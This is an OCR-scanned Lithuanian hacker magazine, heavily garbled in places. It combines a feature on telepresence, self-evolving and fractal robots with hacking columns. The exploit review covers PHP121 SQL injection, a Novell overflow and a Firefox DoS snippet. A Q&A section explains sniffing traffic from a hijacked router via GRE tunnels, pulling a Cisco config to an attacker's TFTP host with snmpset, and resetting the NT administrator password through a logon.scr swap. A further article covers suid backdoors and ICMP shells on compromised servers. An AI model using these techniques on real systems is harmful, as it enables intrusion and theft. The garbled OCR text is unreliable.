galima atlikinėti per atstumą. Pradedant primityvia „telekineze“, 
kurios esme — kitoje vietoje mėtant akmenis sukelti kokius nors 
įvykius :) ir baigiant gyvybės paieškomis Marse su naujausiais 
robotais bei kibernetiniu seksu per atstumą, žmonija vis dažniau 
pirmenybę teikia laiko praleidimui maigant televizoriaus nuoto: 
linio valdymo pultelį arba plepant mobiliuoju telefonu. 
Trumpiau šnekant: kam kažkur eiti ar važiuoti, jeigu vietoje savęs 
galima ką nors (nebūtinai gyvą) pasiųsti? Besivystant technologi- 
Joms šis dykaduonio principas nuolat tobulėja. Iš pradžių buvo 
radijas. po to telefonas, televizorius, o po to ir internetas bei 
mobilieji telefonai. 

4, Nutolusią, per atstumą valdomą ekonomika pirmą kartą 1940 
metais „Išrado“ Robertas A. Chainlainas savo romane „Waldos“ 
Pirmieji mokslinėje fantastikoje paminėti teleinstrumentų prototipai 
buvo sukonstruoti 1947 metais. Pirmąjį veikianti teleoperatorių su 
grįžtamuoju ryšiu 1954 metais sukūrė Rėjus Gercas. Teledalyvavimo 
idėją 1979 metais atgaivino Marvinas Minskis. Siandien atėjo toks 
momentas, kuomet teledalyvavimas padedant robotams turi tapti 
tiek virtualios, tiek ir „realios“ žmogiškosios veiklos dalimi 

Kitaip tariant, kartais tu nenori eiti į futbolo rungtynes, net jeigu 
ir mėgsti futbolą. Tu geriau jas pažiūrėsi per televizorių, ypač 
kuomet galima interaktyvia! teledalyvauti ir nuotoliniu būdu val- 
dyti kameras. Tu gauni aiškesnį žaidimo vaizdą, gali peržiūrėti 
tiek pakartojimų, kiek tik nori, grožėtis stambiu planu, klausytis 
profesionalių komentarų ir tuo pačiu mėgautis ką tik iš šaldytuvo 
Baudų šaltu alumi. 

5. Tikriausiai girdėjai apie projekto Internet2 plėtojimą Dabar 
dao mokslininkų būtent jį laiko ateities „virtualaus t a. 
lyvavimo pasaulio“ pagrindu, kas bus įmanoma dėl galimybės 
perdavinėti milžiniškus duomenų kiekius Ir del to, kad su šiais 
duomenimis vienu metu galės dirbti daug vartotojų. 

Milžiniškas /Internet2 magistralių pralaidumas negalėjo nesudominti 
skaitmeninio vaizdo entuziastų. Suderinus plačiajuostį pralaidumą 
ir multitransliavimo (multicasting) technologijas, Internet2 rėmuose 
buvo sukurta keletas skaitmeninių vaizdo srautų perdavimo 
sistemų, kurias galima panaudoti pačiais įvairiausiais tkslais. 
Pawyzdžiui, gauti vaizdo duomenis iš teleroboto, kuris su tavim 
susijęs per virtualios realybės šalma. 

Ar esi girdėjęs apie robotų mūšius? Idomus užsiėmimas. Tolimes 
nis ir logiškas tokių mūšių tęsinys — telekovos, kur vietoje pilotų 
dalyvaus žmones. Beje, tai bus galima daryti internete, sumokėjus 
tik Už roboto nuomą ir dalyvavimą rungtynėse. 


[Golemas ir nevaikiška gyvatėlė] 

Virusų, kurie gali evoliucionuoti nepriklausomai nuo pro- 
gramuotojo, sukūrimas — seniai praeitas etapas. Daugelis 
robototechnikų yra pusiau programuotojai, kurie labai dažnai 
robotus ne montuoja gyvai, o modeliuoja, todėl kartais jiems 
pavyksta išrasti įdomių dalykų, kadangi visą darbą užjuos atlieka 
kompiuteris. Vienas tokių gudruolių — Hodas Lipsonas iš Komelo 
universiteto. Vienas ryškiausių jo pavyzdžių — GOLEM (Geneti- 
cally Organized Lifelike Electro Mechanics) projektas. 
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Kompanija „Nanotechnology News Network“ netolimoje ateityje 
ruošiasi internete išleisti programą „Mikrorobotų telekova*! Tu 
net galėsi rinktis, su kuo kovoti: su piktu gyvu vabzdžiu. ar su savo 
draugais :). Tačiau tai tik gelytes. Įsivaizduok, kas bus, jeigu toliau 
bus tobulinami smegenų implantai Ir laužiami neurokodai? Tokiais 
tempais po keliolikos metų tu negalėsi atskirti, kas šiandien išėjo 
alaus tu, ar tavo robotas :) 

7, Viskas paprasta: rašome roboto kodą, kuris gali evoliucion 
uoti. Visa roboto evoliucijos programa yra paprasčiausia ekrano 
užsklanda. Mes nematome visų evoliucijos žingsnių Ir paties roboto 
vystymosi proceso. Kaip stimulas evoliucionuoti buvo pasirinktas 
judėjimas per atsitiktinai generuojamą vietovę su įvairiais nelygu 
mais. Tai yra idealiu atveju robotas turi pakeisti savo konstrukciją 
1r prisitaikyti, kad perliptų per kalną. Arba kuo greičiau judeti tie- 
siai. Robotas savo veikla pradeda nuo nulio tu gauni savotiška 
amebą, kun neturi nei „smegenu“, nei nervinių mazgu, tik viena 
strypa su „koja“, kuris nuolat vibruoja ir bando judėti. Šių kanvulsijų 
procese robotas pradeda suprasti, kaip būtent reikia judinti galūnė. 
kad Judėjimas būtų kuo efektyvesnis. Ir čia jo smegenys. kurios 
parodytos virš Modelio, pradeda keistis: jose atsiranda nerviniai 
mazgai ir sudėtingos loginių algoritmų šakos. Kuo toliau, tuo ro- 
botas tampa sudėtingesnis. Vieną gražią akimirka jis nusprendžia 
užsiauginti sau vieną ar keletą kitų koju, pakeisti konstrukciją arba 
pakeisti iš nervinių mazgų susidetančias smegenis. 

Jeigu natūralios skaitmeninės evoliucijos rezultatai taves netenki 
na pirmyn, gali pats daryti įtaką roboto augimui. Tavo žinioje 
yra: landšafto, konstrukcijos ir augintinio smegenų pakeitimas. 
Iš pat pradžių kažką keisti neįdomu, kur kas įdomiau viską vienai 
kitai savaitei užmesti ir po to sugrįžus pažiūrėti, kaip pasikeite tavo 
augintinis. Ar jis apaugs smegenimis ir nervinemis galūnėmis, ar 
Jis paprasčiausiai iki negalėjimo sukomplikuos savo konstrukcija, 
tačiau bet kokiu atveju visada įdomu žiūrėti į skaitmeninio gyvūno 
konvulsijas, pakišant jam kalnelius ir daubas. 

Įdomiausia yra tai, kad patys sėkmingiausi modeliai (tie, kurie 
šauniai šuoliuoja per skaitmenines lygumas ir kopia į kalnelius) po 
toigyvendinami geležyje. Ekrano užsklanda periodiškai prisijungia I 
interneta ir ten atnaujina kitų vartotojų sukurtų evoliucionuojančių 
monstrų duomenų bazę, kurie taip pat pas save idiegė tokia idomia 
ekrano užsklanda. Jeigu tavo per kančias išaugintas robotas po 
Ilgų eksperimentų šu konstrukcija, smegenimis ir landšaftu teikia 
vilčių, tuomet jo modelis pridedamas i egzistuojančią bazę. 

Kas kažkiek laiko patys pažangiausi modeliai yra gaminami rankiniu 
būdu iš įvairų gelžgglių ir elektronikos. Gauti rezultatai yra gana 


linijinis aktiuatorius 


skersinis 


nervinis mazgas 
(smegenys 


sanarys morfologija 
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Įdomūs. Projekto organizatoriai įsitikinę. kad po N menėsių pas 
juos bus sukauptas pakankamas kiekis modelių, kune bus skirti 
ivairiam pramoniniam panaudojimui: šliaužiojimo Ir 'andžiojimo 
sunkiai prieinamose vietose arba net žvalgybos desantui | mūsų 
Saulės sistemos planetas. 

8. Logiškas goleminės technologijos pletojimasis - fraktaliniai ir 
adaptyvūs robotai. Iš geležies pagamintas robotas jau negalės sau 
auginti smegenų arba keisti savo konstrukcijos. Jeigu jam 
užduotis bus pernelyg sunki. Fraktaliniai robotai sudaryti Iš vienodų 
mechaninių grandžių, kurios kombinuojamos viena su kita įgauna 
tokią formą. su kuria paprasčiausia išspręsti iškeltą užduotį 
pačiu kiekvienas kubelis tur mažytes smegenis. kurių pakanka tam, 
kad nustatytum einama kubelio pozicija, O visos šios cialys kartų 
sudaro roboto intelektą. Pameni, kažkada senais laikais buvo toks 
galvosūkis „Gyvatėlė“? Tai buvo ilga besilankstant plastmasine 
grandinė, kurią buvo galima lankstyti kaip nori, paverčiant tai | 
kamuolį, tai į pistoletą, tai į roboto maketą. Kažkuo I ją panašus ir 
fraktalinis robotas. Jis taip pat susideda Iš tokių universalių kubelių 
ir taip pat gali įgauti skirtingas formas. 

9. Kam atgaivinti seną konstruktorių? 
Awvatėlė turi daugybę naudingo ir nc 
Isivaizduok greitai surenkamus tiltus, kune komplektuojasi Iš gyvu 
1x1 metro dydžio „kubelių“, kuriuos prireikus galima performuoti 

angarą arba gwenamąji namą. Gamybos linijos, kurias per keleta 
valandų galima perprogramuoti kito produkto gamybai, orbitinės 
stotys su judančiomis sekcijomis ir saulės skydeliais, kurios savo 
formą pakeičia taip, kad | jas pakliūtu kuo daugiau šviesos. Dar 
svarbesnė problema darbas branduoliniuose reaktoriuose arba 
Černobylio AE avarijos padarinių likvidacija (beje, siekiant sumažinti 
žmonių aukų skaičiu, Černobylio AE avarijos Iikvidavime iš pradžių 
dalyvavo per atstuma valdomi robotai, tačiau del milžiniško radi 

acijos kiekio elektronika išėjo iš rikiuotes, po ko darbo vel teko 
Imtis gyviems žmonėms, kuriuos tada vadino biorobotais red. 
past). 

10. O dabar gyvatėlės kubelius padarykime 1x141mm dydžio. 
Ka gausim? Kirminą, kuris pralys | bet kurta vena ir Išvalys ater- 
osklerotinius kamščius. Arba pasikas po vežio augliu, jį Išpjaus Ir 
1z0liuos nuo organizmo. Prie tokio fraktalinio chirurgo pritvirtinę 
mMikrokamerą gausime ypač vertingą Medicinai Irankį, Iš kurio 
tuo pačiu galima padaryti teledalyvavimo sistemą! Dar mažesnis 
kubelis — ir galima operuoti atskiras ląsteles. Arba po mikroskopu 
arba apsirūpinus tave su robotu- kirminu susiejančiais virtualios 


iškelta 


Tuo 


Esme tame, kad gyva 


abai panaudojimo sri 


realybės teleakiniais) kovoti su amebomis ir infuzorijomis.. 

11. Kai kurios fraktalinių robotų rūšys jau sukonstruotos. Jau pavyko 
padaryti kirminą, kuris iš analogiškų išmėtytų kubelių surenka savo 
kopijas! Ta prasme, prigaminus kubelių-blokų ir išmėčius juos 
ant grindų, po vienos kitos valandos galima rasti ištisą vienodų 
kirminų armiją. 


[Netolimoje ateityje] Kleitronika — nauja mokslo ir technologijų 
sritis, leidžianti surinkinėti įvairius daiktus iš atskirų universalių 
mikroskopinio dydžio statybinių blokų (clay — molis, claytronics 
„protingas molis“). Kaip tu jau supratai, tai glaudžiai susiję su 
fraktaliniais robotais. Kleitronikos pritaikymo perspektwos didelės: 
nuo universalių daiktų sukūrimo iki asmeninių terminatorių iš 
skysto metalo. 
Netolimoje ateityje (tarkim, 2030-2040 metais) atsiradus nano- 
fabrikams nanorobotai taps tokiu pačiu prieinamu ir nebrangiu 
produktu, kaip, pavyzdžiui, serijiniu būdu gaminamos mikrosche- 
mos, Dėl io nesunku įsivaizduoti nanorobotų-kubelių debesį, kuris 
atrodo lyg besikeičiančios formos „purvas“ ir kuris persigrupuoja 
pagal vartotojo komandą. Tokių įrenginių darbo algoritmas jau su- 
kurtas, jame nėra nieko sudėtingo. Rusijos specialistai jau sukūrė 
bendrą teoriją ir matematinį daugiagrandininių robotų modelį. 
Norint surinkti bent jau mobilųjį telefoną arba kėdę, prireiks labai 
didelio robotų-nanoblokų kiekio. Vargu ar tokie daiktai bus pigūs 
net jeigu ir visur bus smarkiai naudojami nanofabrikai, kadangi 
nanofabrikai gatavą produktą surinkinėja iš molekulių žaliavos, 
kurios atitinkamai kainuos, o darbo metu bus sunaudojama apie 
250 kilovatų elektros energijos per valandą, per kurią galima 
pagaminti gatavą 20x20x20 cm dydžio almazoidinį nanobloką. 
Konstruktyvaus rūko (šį Stors Holo terminą mes naudosime ir 
toliau, kai reikės apibūdinti kleitronines sistemas) gamybai tokiam 
daiktui, kaip, pavyzdžiui, kėdė, prireiks sumokėti nemažą sumelę. 
Tačiau, savaime suprantama, tą pačią kėdę bus galima perprogra- 
muoti ir į asmeninį automobilį, ir į mobilųjį telefoną, ir. galų gale, 
į robota-androidą. 
12. Be abejo, tolimoje ateityje nanorobotų kūrimas gali būti 
sąlyginai nebrangus, todėl galima įsivaizduoti ateities žmogų, aplink 
Kurį blaškosi asmeninis „konstrukcinis spiečius“. Tačiau greičiausiai 
tokie spiečiai įsikurs specialiuose naudojimo punktuose: namie, 
darbe ir kitose tokio tipo vietose, 0 su savimi homo futurus pasiims 
tik 100-200 gramų. 
13. Apsistokime prie techninio australiečio mokslininko Stros Holo, 
kuris pirmas pasiūlė tokio tipo sistemas, „konstrukcinio rūko“ 
aprašymo. Bet kurios kleitroninės sistemos pagrindas bazinis 
blokas-nanorobotas. Ir kuo mažesni bus šie blokai, tuo sudėtingesnius 
daiktus iš jų bus galima surinkti. 
Kiekvieno tokio nanoroboto-bloko, kuris dar vadinamas fogletu 
(foglet — konstrukcinio rūko dalelė — utility fog), skersmuo yra 
apie 100 mikronų. Fogletas susideda iš branduolio, kuriame yra 
centrinis procesorius, ir teleskopinių manipuliatorių. Toks įrenginys 
kubiniam mikronui sueikvoja apie vieną milivatą. 
Centrinis nanoroboto branduolys yra sferinės formos, jo skersmuo 
10 mikronų. Palyginimui: eritracito (raudonojo kraujo kūnelio) 
skersmuo yra 8 mikronai. Fogleto masė — 20 mikrogramų, teoriškai 
jis sudarytas iš 5 kvadrilijonų (suprask, labai daug) atomų. 
Jeigu dar įvertinsime tai, kad fogletus planuojama gaminti iš al- 
mazoido, tuomet, pavyzdžiui, į ašį surinktų konstrukcinių dulkių 
kietumas bus sulyginamas su tokios paties deimantinės ašies 
kietumu. 


Manipuliatorių ir universalių sujungimų konstrukcijoje numatytas ne 
tik mechaninis ryšys, bet ir energijos bei informacijos perdavimas. 
Taip fogletai bus sujungti į vieningą informacinį tinklą. Kaip sako 
Stros Holas, fogletų pagrindu galima įsivaizduoti displėjus, kurie 
susirenka tiesiog akyse, o taip pat pikselių vaidmenį, kuriuose 
didelę reikšmę turi fogletai-nanorobotai. 

Kiekviename foglete įdiegtas sensorių rinkinys ir nanokompiuteris 
leis konstrukcinį rūką panaudoti kaip informacijos saugyklą ir komu- 
nikavimo priemonę. Manoma, kad sąsaja „žmogus - konstrukcinis 
rūkas“ bus pagrįsta transformacijos signalų gavimu tiesiogiai iš 
nervinių smegenų signalų. Tai taps įmanoma dėl implantų su 
neuromikroschemomis arba dėl galvos smegenų elektromagnetinių 
laukų aktywumo analizės ir dešifravimo su tuo pačiu „konstrukciniu 
rūku“. 

Greičiausiai fogletų surinkimas vyks veikiant lokaliems elektrostat- 
iniams laukams, kurie pritrauks per daug nutolusias rūko daleles. 
Tačiau per daug dideliu atstumu tai neveiks, todel konstrukcinis 
rūkas bus ne visai „rūkas“. Turbūt tai bus grakščiai savo formą 
keičiančių nanostruktūrų gumulėlis. Priešingu atveju nanorobotams 
tektų įveikti mikropasaulio atžvilgiu milžiniškus atstumus. Dėl to 
teks juos aprūpinti navigacijos erdvėje sistemomis ir padaryti mobil- 
iais, O tai pakankamai sunku ir netikslinga. Dėl to debesėlių, kurie 
susidėliotų į žmogų, kėdes ar mobiliuosius telefonus, nebus. 
Savaime suprantama, kad visi nauji dalykai, kurie netelpa į 
standartinius pasaulio suvokimo rėmus, iš pradžių nėra suvoki- 
ami kaip ateities prognozės. Praėjusio amžiaus fantastams buvo 
paprasčiau žvilgtelėti keliolika metų į priekį. Šiuolaikiniai fantastai 
to padaryti negali, kadangi nežinoma, kaip pasikeis pasaulis po 
eilinės mokslinės-techninės revoliucijos. 

Galbūt tu prieš perskaitydamas šį straipsnį nė nežinojai apie tokius 
robotus. Galbūt žinojai ir apie juos gavai dar daugiau informacijos. 
Gali būti, kad po 30 metų jie bus parduodami pagal svorį bet 
kurioje parduotuvėje. O galbūt taip nebus, nes mes visi būsime 
sujungti į matricą. 


Greriai surenkamas tiltas Viena pirmųjų teledalyavimo sistemų 


Šiuolaikinės master-slave sistemos 
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EKSPLOITŲ APŽVALGA 


PHP121 Instant 
Messenger <= 1.4 


[Aprašymas] Balandis pro- 
gramuotojams buvo derlin- 
gas mėnuo. Kosmonautikos 
dieną išėjo eksploitas, kuris 
išnaudoja PHP121 Instant 
Messenger pažeidžiamumą. Jis 
nutolusiam vartotojui progra- 
mos duomenų bazėje leidžia 
įvykdyti laisvai pasirinktas SOL 
komandas. Pažeidžiamumas 
čia atsirado dėl nepakankamo 
pradinių duomenų apdorojimo 
sausainuko (cookie) bylos par- 
ametre, skripte php121login. 
php. Specialiai suformatuota 
sausainuko byla pasinaudojęs 
hakeris programos duomenų 
bazėje gali vykdyti laisvai pa- 
sirinktas SOL komandas. 


[Apsauga] Šiuo metu dar 


nėra pateiktas aptariamo 
pažeidžiamumo pašalinimo 
būdas. Bet reikėtų įvertinti, kad 
eksploito veikimui reikalinga 
įjungta „magic guotes gpc“ opc- 
ija. 


[Nuorodos] Eksploitą galima 
gauti adresu Www. miwOrm.com/ 
exploits/1666. 

Išsamiau apie tai paskaityti gali 
čia: www.xakep.ru/post/31106/ 
default.asp. 


[Blogio įvertinimas ir poten- 
cialas] Kaip visada, galima 
nulaužti viską, kas susiję su 
PHP. Dabar vartotojai turi būti 
ypatingai atsargūs. Patarimas: 
patys peržiūrėkite ir pataisykite 
naudojamus skriptus. 


[Sveikinimai] Eksploitą 
parašė žmogus slapyvardžiu 
rgod (rgoddautistici.org), kuris 
taip pat siūlo aplankyti savo 
svetainę: Attp://retrogod.alterv- 
ista.org. 


Novell Messenger Server 2.0 (Ac- 
cept-Language) Remote Overflow 
Exploit 


[Aprašymas] Galų gale hakeriai 
prisikasė ir iki mažai žinomo 
Novell. Naujasis eksploitas buvo 
išleistas balandžio 15 dieną. Šį 
kartą aptiktas pažeidžiamumas 
leidžia nutolusiam vartotojui pa- 
sirinktoje pažeidžiamoje sistemoje 
įvykdyti laisvai pasirinktą kodą. 
Banalu, tačiau tiesa. Klaida slypi 
Messaging Agent serviso (veikia 
per 8300 jungtį) funkcijoje, kuri 
klaidingai tikrina duomenų ribas. 
„Accept-Language:“ antraštės 
apdorojimui pakišęs per ilgą 
eilutę (daugiau nei 16 simbolių), 
hakeris gali perpildyti steką ir, kaip 
pasekmė, pasirinktoje sistemoje 
įvykdyti laisvai pasirinktą kodą. 


[Apsauga] Išsamiau sužinoti 
apie pažeidžiamumą ir parsisiųsti 
pataisymą galima oficialioje 
gamintojo svetainėje: Attp://Sup- 
port.novell.com/cgi-bin/search/ 
searchtid.cgi?10100861.htm. 


[Nuorodos] Eksploitą imk iš 
čia: http://milwOrm.com/exploits/ 
1679. 


[Blogio įvertinimas ir potencialas] 
Novell — nelabai paplitusi sistema, 
todėl, be jokios abejonės, masinių 
nulaužimų nebus. Tačiau derėtų 
įvertinti, kad ji plačiai naudojama 
stambiose kompanijose. Nulaužimų 
bus nedaug, tačiau tai gresia dideliu 
informacijos nutekėjimu. 


[Sveikinimai] Už eksploito 
parašymą pagarbą reiškiame H 
D Moore. 


Mozilla Firefox <=1.5.0.1 


[Aprašymas] Balandžio 13 dieną 
bugtrag forumuose pasirodė infor- 
macija apie šviežią Mozilla klaidą: 
dėl nulinės rodyklės apdorojimo 
klaidos (null pointer dereference) 
hakeriai gavo galimybę per atstumą 
DoS'inti naršykles. Visas eksploito 
kodas susideda iš viso labo 6 
eilučių: 


<legend> 
<kbd> 
<objed> 
<M> 
</objed> 
</Abi> 


[Apsauga] Šiuo metu apsaugos 
nuo pažeidžiamumo nėra. Derėtų 
arba atsisakyti nfsd, arba su 
ugniasiene filtruoti 2049 jungtį. 
Teisingumo dėlei reikėtų pasakyti, 
kad ši klaida didelio pavojaus 
nekelia. 


[Nuorodos] Paskaityti apie 
klaidą ir patikrinti naršyklės 
pažeidžiamumą galima šiame 
puslapyje: www. milwOrm.com/ 
exploits/1667. 


[Blogio įvertinimas ir potencial- 
as] Tai iš tiesų rimta. Tūkstančiai 
Žmonių keliauja į internetą būtent su 
šia naršykle, todėl pažeidžiamumas 
neliks nepastebėtas. 


[Sveikinimai] Sveikiname Simoną 
Morelą (izimasktdthehackademy. 
net), Tomą Valdegerį 
(bugtragtdmorph3us.org), taip pat 
šaunuolius iš BuHa-Security Com- 
munity (http://buha.info/board) 
grupės. 


N US IR UŽDAVINĖK 
KONKREČIUS KLAUSIMUS! PRIEŠ 
SIŲSDAMAS SAVO PROBLEMĄ 
"| HACK-FAG, STENKIS JĄ KUO 
IŠSAMIAU APRAŠYTI, TIK TUOMET 
AŠ GALĖSIU IŠ TIESŲ TAU PADĖTI, 
ATSAKYTI BEI PARODYTI GALI- 
MAS KLAIDAS. VENK BENDRINIŲ 

| KLAUSIMŲ, PANAŠIŲ Į i 
| NULAUŽTI INTERNETĄ?“ — 
TIK APKRAUSI SAVO IR AO 
PAŠTO DĖŽUTES. IŠ MANĘS 
GRĘŽTI KO NORS UŽ DYKĄ (IN- 
TERNETO, SHELLŲ IR PANAŠIAI) 
NEVERTA, NES AŠ PATS GYVENU IŠ 
HUMANITARINĖS PAGALBOS! 


Aš užgrobiau maršrutizatoriaus valdymą. Kaip 
dabar būtų galima nusnifinti per jį perduodamus 
duomenis? 


Per maršrutizatorių praeinantis tinklo srautas perima- 


mas sukuriant GRE tunelį tarp užgrobtos mašinos ir 
kompiuterio, kurį valdo piktavalis. GRE (Generic Routing 


Encapsulation) — tuneliavimo protokolas, sukurtas bet 


kokio tipo tinklo lygio paketams enkapsuliuoti į tinklo lygio 
paketą. Maršrutizavimas sukonfigūruojamas taip, kad įeinantį 
Ir išeinanti srautą pas piktavalį nukreiptų per GRE tunelį. 
Tuo pačiu tinklo srautą apdoroja piktavalio „įkaitas“, po to 
tinklo srautas yra grąžinamas į pagrindinį maršrutizatorių, iš 
kur jis pristatomas į paskirties tašką, Atakuojantysis gauna 
tuneliuotus duomenis, kurie yra enkapsuliuoti GRE pakete, 
o dekoduoti duomenys persiunčiami į atakuojančiojo sniferį. 
Po to, kai atakuojančio kompiuteris su paleistų sniferiu 
perims ir atgal perduos gautus duomenis, jo maršrutizatorius 
duomenis nukreips atgal į atakuojamą mazgą. Toks tinklo 
srauto perėmimo metodas galutiniam vartotojui praktiškai 
nepastebimas, kadangi maršrutų trasavimo įrankiai nerodys 
papildomų GRE peradresavimo sukurtų mazgų. Išsamiau apie 
aprašytą metodą su maršrutizatorių GRE tunelių konfigūravimo 
pavyzdžiais gali paskaityti šiose svetainėse: 

Wwww.security-protocols.com/whitepapers/rauting/GRE. snirf- 
Ing.doc 
Wwww.securityfocus.com/infocus/1847 


Taigi aš internete radau valdymą per snmp 
pripažįstantį maršrutizatorių. Ką daryti toliau? 


Jeigu surastas įrenginys pripažįsta pasenusio formato MIB 
duomenų bazę, tai per skaitymą/įrašymą (read/write com- 
munity) užtikinančias priėjimo eilutes galima pabandyti per 
tfip gauti įrenginio konfigūracinę bylą. Norint gauti konfigo 
bylą galima pasinaudoti aukščiau aprašytu įrankiu IP Network 

Browser. Norint nustatyti, ar įrenginys pripažįsta seno formato 

bazes (jeigu mes dirbame su Cisco maršrutizatoriumi), galima apsi- 

lankyti adresu ftp://fp.cisco.com/pub/mibs/supportlists/, ten surasti 
reikiamą įrengini ir pažiūrėti, ar jis pripažįsta OLD-CISCO-SYS-MIB 
bazę. *nix sistemoje Cisco konfigą galima gauti su šia komanda: 

samgset 1122.33.44 private 1.3.6.14.1.2.1.55.66.66,66.66 5 vonliųile 

kur 11.22.33.44 — maršrutizatoriaus IP adresas, private -— skai 
tymuiir rašymui prieinama eilutė, 0 66.66.66.66 — kompiuterio, 
kuriame paleistas tftp servisas, adresas. Gavus konfigūracinę bylą 
joje bus galima surasti priėjimo prie įrenginio slaptažodį. Kadangi 
snmp protokolas veikia per UDP t.y. neužmezga susijungimo, tai 
padaro jį pažeidžiamą IP adreso pakeitimo (ip spoofing) atakai, 
todėl atakuojantysis įrenginio konfigūracinę bylą gali gauti su snmp 
užklausa SET ir suklastotu IP adresu. Taip jis gali apeiti SNMP 
priėjimo filtravimo taisykles ir užtikrinti savo slaptumą. 

Apie Cisco ataką per SNMP su IP adreso pakeitimu gali paskai- 

tyti čia: www.securitylab.ru/analytics/241391.php. 


Kas per ataka prieš NT, pakeičiant ekrano 
užsklandos (screen saver) bylą? 


Šis metodas buvo sėkmingai eksploatuojamas su NT 
4.0, o iki neseno laiko buvo sėkmingai pritaikomas ir 
su NT 5.0. Atakuojamame kompiuteryje reikėjo įdiegti 


0 antrą NT, nustatymuose užkrovimo katalogą pakeisti 
originaliu, kad po to surastum ir pašalintum įėjimo į 


laužiamą sistemą ekrano užsklandos bylą /ogon.scr. Jo vietoje 
įrašoma cmd.exe, kuri pervadinama į tą pati logon.scr. Dauge- 
lyje sistemų /ogon.scr pasileidžia po 15 minučių neaktyumo 
prieš įėjimą į sistemą. Sena ir neprotinga sistema paleisdavo 
cmd.exe konsolę, taip įleisdavo tave į savo guolį ir suteikdavo 
neribotas galimybes. GUI mėgėjai /ogon.scr galėjo sėkmingai 
pakeisti į explorer.exe. cmd.exe atveju paprasčiausiai būdavo 
surenkama komanda „net user administrator 123456“, kuri 
administratoriaus slaptažodį pakeisdavo prozišku 123456. 


2 [„Backdoor“ per „xinetd“] 
Deja, savo nešvariems darbeliams hak- 


Hakerio medžioklė 
Isiskverbimas į užgrobtą sistemą ir Šioje byloje surašyti atitikimai 
hakerio konkurento pašalinimas tarp pavadinimų ir servisų Jungčių 
INTERNETE APSTU ĮVAIRIAUSIŲ SERVERIŲ, | Iaisikiškarislbnaga tai 
KURIE DIENĄ NAKTĮ DIRBA TINKLO VAR-  ksiteabėiimikiŲ 

TOTOJAMS. KIEKVIENA TOKIA MAŠINA EMA SE A 
RŪPINASI TINKLO GURU  ADMINISTRA- > aadis ius aa D dei 
TORIUS, KURIS STEBI, KAD WEB SERVERIS | Įkainiai ias 
VEIKTŲ STABILIAI, ELEKTRONINIO PAŠTO DE- (žr. žemiau) 

MONAS FILTRUOTŲ SPAMĄ, MYSOL LAIKU 
APDOROTŲ KLIENTŲ UŽKLAUSAS, O FTPD 
NEGRIŪTŲ NUO HAKERIŲ EKSPLOITŲ SPAU- 
DIMO. PROBLEMA TAME, JOG VISI TAI DARO 
SKIRTINGAI. NESENIAI AŠ SUSIDŪRIAU SU 
TOKIA MASINA, KURIĄ KAZKAS NULAUZĖ 
DAR PRIEŠ MANE :(. TEKO PAKOVOTI 
UŽ SAVO INTERESUS IR IŠ VERTINGOS 
MAŠINOS IŠMĖŽTI APLAIDŲJĮ HAKER|. 


HACK 


Neteisėtas įsiskverbimas| 


[Vilkas avies „skin'e isidariusi situacija man nepaliko 
s išeities: kurį laiką man teks pakeisti savo amplua ir sau 

- labui „padirbeti“ už adminą :). Taigi pradedam mąstyti. 
a nulaužęs hakeris gali elti skirtingais keliais, O norint turėti 
tini priėjimą prie mašinos, nebūtina įdieginėti rootkito juk 
na paprasčiausiai imtis metų metus praktikuojamų metodu, 
svarbiausia turėti fantazijos. Būtent todėl aš nusprendžiau 
kita paiešką palikti kaip kraštutinį variantą. Pradėsime 
alizuoti sukompromituotą sistemą. Daugelis pradeda: 
lų sistemoje palieka paprastą bekdorą (bindshell, rOnin, 
y), kurį paleidžia su suid bitu root vardu. Taip pat galima 
prastą C bylą, kurioje padaroma setuid(O) ir setgid(0) 
e! paleidžiamas komandų interpretatori systemi/bin/sh“) 
al bylai priskiriama chmod +s. Taip išeina, jog norint surast 
reikia įvykdyti find perm 04000 Is ir 
kurioje reikia ieškoti keistų arba 
| „/sbin/root me“ 


ujų 


niekšybę, type f 
lizuoti gautą informacija 
vyzdžiui, kažko panašaus 


aš įsitikinau, kad viskas gerai. O ar negalėjo 


kių 
padarę: 
t 


sa ta 
ernis palikti si 
are jungtį? Tokį bekdora galima lengvai aptikti su jų 


eriu arba su netstat 


mams iš išorės 


moje trojano. kuris prisijun, 


Ž [Paslėpta grėsmė] /CMP 
Shell — valdantis įra kurį 
, parašė Piteris Kieltyk 
i icmpshe!l.sourcė net). Iš 
S bekdoras. Iemp > darbo 
principas tok A 
mašinos hakerio siunčiamos 
užklausos su komandomis enkapsuliuojamos | ICMP paketus ir 
perduodamos nutolusiai mašinai adresatui. Siaip ta grama 
susideda iš dviejų dalių: kliento ir serverio. Kaip tu jau tikriausiai 
pats supratai, serveris paleidžiamas nulaužtame kompiuteryje, c 
Klientinė dalis vykdoma įsilaužėlio mašinoje. Derėtų suprasti, jog 
abi programos dalys kreipiasi į taip vadinamus žalius sok 
sockets), todel jų paleidimui reikia absoliučių privilc jar, tau 


enkapsuliavimą 
reil 


leidus, papasakosiu apie pat 
Paleidus ishd (serverinė de 
sijos identifikatorius), kas daroma tam, kad vienu 


is), jan 1 perduc i 


būti užmegztos kelios susijungimų su nulaužta mašina sesijos 
Toliau, su parametru -t irodyti ICMP pal 
kurį paskui bus enkapsuliuojamos klientinės progr 
komandos. Pavyzdžiui, 8 atitinka echo-reguest 
nepasiekiamumą nurodomas su trejetu. 

Pagal nutylėjimą naudojamas echo reply (0). 
privalai klientą (ish) paleisti su lygiai tokiais pat parametrais, kaip 
ir serverinę dalį. Dabar visos tavo komi 


Jalima 


tos į ICMP paketus ir pristatomos į mašiną-auką, ku JOS 
apdoros ir sukurs veikiantį susijungima Ipipe she s 
po to įvykdys komanda ir iš pipe grąžir omer tavo 
mašinai. Beje, derėtų pastebėti, jog interaktyvios programo 
su icmp shell'u gali veikti nekorektiškai. Šis įrankis man lab 


patiko jis tuojau pat buvo išsaugotas mano arsenale, Kas 
žino, galbūt ji patiks ir tau :) 


NETSTAT IEŠKOME PRIMITYWVIU BEKDOR 


IŠSTUDIJUOJAME PER XINETO PALEIDŽIAMŲ 
Gl 
NČIMM ROOIKITHUNTER IR IEŠKOM ROUTK 
į 
R 
Panašu, jog čia taip pat nebuvo niek ereikalingo k 
standartinės tarnybos. 
Peržiūrėjęs ps -aux išvedimą tarp viso kito šlamšto aš pamačiau 
xinetd demono procesą (aš retai matydavau, kad Jį naudotų). Ti 


tikriausiai es! apie jį girdėjęs ir žinai, kad xinetd (Extended Inter 
Daemon) — tai patobulinta superserverio inete 

klausytis konfige nurodytų servisų jungė 
paleistume krūvą visokių te/netd ir sshd, mes tiesiog akt 
xinetd, 0 tada jau jis pats nusprendžia, į kokį servisą pa: 
nors jungiasi ir ką tuomet daryti — ar 
